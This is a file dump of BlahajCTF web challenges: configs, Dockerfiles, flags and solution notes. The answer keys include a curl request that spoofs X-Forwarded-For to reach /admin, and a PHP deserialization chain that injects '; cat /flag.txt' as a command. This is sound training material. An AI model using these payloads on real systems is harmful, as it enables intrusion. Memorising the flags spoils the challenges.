5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 3 | PyJWT==2.9.0 -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Insecure Content 2 | author: hartmannsyg 3 | category: web 4 | description: Secure Content was secure, but this time its more (less) secure! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{n0t_50_s3cuRe_1sit} 13 | -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | 4 | COPY ./requirements.txt /app/requirements.txt 5 | # switch working directory 6 | WORKDIR /app 7 | 8 | USER root 9 | 10 | # Install python 11 | RUN apk update 12 | RUN apk add --no-cache python3 py3-pip 13 | 14 | RUN python --version 15 | RUN pip --version 16 | 17 | # install the dependencies and packages in the requirements file 18 | RUN pip install -r requirements.txt --break-system-packages 19 | 20 | 21 | # copy every content from the local file to the image 22 | COPY . /app 23 | 24 | RUN npm ci 25 | 26 | 27 | 28 | # run 29 | CMD ["python3", "app.py"] -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | insecurecontent: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "src", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "admin.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "puppeteer": "^23.6.1" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /Challenges/Web/insecurecontent/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/johndoe/challenge.yml: -------------------------------------------------------------------------------- 1 | name: John Doe's Homepage 2 | author: fern 3 | category: web 4 | description: John Doe just made a new website! He hid a flag somewhere, and claims only he can access it! Can you prove him wrong and get the flag? 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{x_f0rw4rD3d_F4r_wH0} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | `curl http://[site]/admin -H "X-Forwarded-For: 69.42.123.69"` This works because the `/admin` check presumably trusts the client-supplied `X-Forwarded-For` header (the application source is not shown here); an access decision should rest on the connection's peer address, or on a forwarded header set only by a trusted reverse proxy. -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | johndoe: 3 | privileged: false 4 | build: .
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/johndoe/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/pkiller/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Process killer panel 2 | author: fern 3 | category: web 4 | description: I made this panel to make process management and killing so much easier! It's still not very complete, so it may have some bugs... Flag is in /flag.txt 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{p0P_Pop_cH41N} 13 | 14 | files: 15 | - dist/chal.php 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/soln/soln.php: -------------------------------------------------------------------------------- 1 | isAdmin = $isAdmin; 6 | } 7 | } 8 | class addKill { 9 | function __construct($killme){ 10 | $this->killme = $killme; 11 | } 12 | } 13 | class MainClass { 14 | function __construct(){ 15 | $this->name = new KillerJob(true); 16 | } 17 | } 18 | echo base64_encode(serialize(array(new addKill("; cat /flag.txt"), new MainClass()))); 19 | ?> 20 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | PHP pop chain, look in `soln/` -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.2-apache 2 | COPY src/ 
/var/www/html/ 3 | COPY src/flag.txt /flag.txt 4 | #COPY src/000-default.conf /etc/apache2/000-default.conf 5 | COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf 6 | COPY src/ports.conf /etc/apache2/ports.conf 7 | RUN adduser --uid 1001 --disabled-password nonroot 8 | USER 1001 9 | EXPOSE 8000 10 | CMD ["apache2-foreground"] -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pkiller: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/.htaccess: -------------------------------------------------------------------------------- 1 | DirectoryIndex index.php -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{p0P_Pop_cH41N} -------------------------------------------------------------------------------- /Challenges/Web/pkiller/src/src/ports.conf: -------------------------------------------------------------------------------- 1 | 2 | Listen 8000 3 | 4 | 5 | Listen 443 6 | 7 | 8 | 9 | Listen 443 10 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Screenshooter 2 | author: fern 3 | category: web 4 | description: I made an epic new website to take screenshots! Check it out! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{fL45k_D3veL0p0r} 13 | 14 | files: 15 | - dist/app.py 16 | - dist/requirements.txt 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/dist/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | markupsafe==2.0.1 -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/` -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # switch working directory 5 | WORKDIR /app 6 | 7 | RUN apk update 8 | RUN apk add firefox 9 | RUN apk add font-terminus 10 | COPY ./requirements.txt /app/requirements.txt 11 | # install the dependencies and packages in the requirements file 12 | RUN pip install -r requirements.txt 13 | 14 | # copy every content from the local file to the image 15 | COPY . /app 16 | RUN chmod 777 /app/screenshots 17 | RUN adduser --uid 1001 --disabled-password nonroot 18 | USER 1001 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | screenshooter: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag1.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag10.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag10.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag100.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag100.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag11.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag11.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag12.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag12.txt -------------------------------------------------------------------------------- 
/Challenges/Web/screenshooter/src/flags/fakeflag13.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag13.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag14.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag14.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag15.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag15.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag16.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag16.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag17.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag17.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag18.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag18.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag19.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag19.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag2.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag20.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag20.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag21.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag21.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag22.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag22.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag23.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag23.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag24.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag24.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag25.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag25.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag26.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag26.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag27.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag27.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag28.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag28.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag29.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag29.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag3.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag3.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag30.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag30.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag31.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag31.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag32.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag32.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag33.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag33.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag34.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag34.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag35.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag35.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag36.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag36.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag37.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag37.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag38.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag38.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag39.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag39.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag4.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag4.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag40.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag40.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag41.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag41.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag42.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag42.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag43.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag43.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag44.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag44.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag45.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag45.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag46.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag46.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag47.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag47.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag48.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag48.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag49.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag49.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag5.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag5.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag50.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag50.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag51.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag51.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag52.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag52.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag53.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag53.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag54.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag54.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag55.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag55.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag56.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag56.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag57.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag57.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag58.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag58.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag59.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag59.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag6.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag60.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag60.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag61.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag61.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag62.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag62.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag63.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag63.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag64.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag64.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag65.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag65.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag66.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag66.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag67.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag67.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag68.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag68.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag69.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag69.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag7.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag7.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag70.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag70.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag71.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag71.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag72.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag72.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag73.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag73.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag74.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag74.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag75.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag75.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag76.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag76.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag77.txt: -------------------------------------------------------------------------------- 
